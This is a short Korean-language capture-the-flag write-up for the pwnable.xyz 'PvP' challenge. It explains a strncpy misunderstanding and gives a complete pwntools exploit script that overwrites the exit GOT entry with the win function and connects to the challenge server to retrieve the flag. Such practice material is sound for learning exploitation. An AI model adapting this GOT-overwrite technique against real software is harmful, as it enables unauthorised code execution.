pwnable.xyz / PvP

너무 멍청했다 말하기도 쪽팔린다
strncpy가 널바이트가 나올때까지 복사된다고 생각했다


strncay으로 포인터를 덮을 수 있고 exit got함수를 win함수로 덮어서 시그널 터질때 플래그가 출력되도록했다

from pwn import * 
#context.log_level = "debug"

exit_got = 0x6020a0


def save():
    p.recvuntil(b"> ")
    p.sendline(b"4")
    p.recvuntil(b"message? ")
    p.sendline(b"3")

def append(arr, func_type):
    p.recvuntil(b"> ")
    p.sendline(str(func_type))

    p.recvuntil(b"me ")
    num = int(p.recvuntil(b" "))
    
    if num == 0:
        return 0
    elif num > len(arr):
        num = num - len(arr)
    elif num == 1:
        p.send(b"\x00")
        return 0

    pay = arr[:num -1 ]
    pay += b"\x00"
    p.send(pay)
    
    return num - 1


payload = b"\x2d\x0b\x40"
payload += b"A" * (0x400 - 3)
payload += p64(exit_got)

num = 0
total_len = 0
while True:
    total_len = 0
    p = remote("svc.pwnable.xyz", 30022)
    #p = process("./pvp")
    num = append(payload, 2)
    print("long num: " + hex(num))
    if num < 0x100:
        p.close()
    else:
        total_len += num
        payload = payload[num:]
        while True:
            num = append(payload, 1)
            payload = payload[num:]
            total_len += num
            print(total_len)

            if total_len >= 0x408:
                break
        break

save()
p.interactive()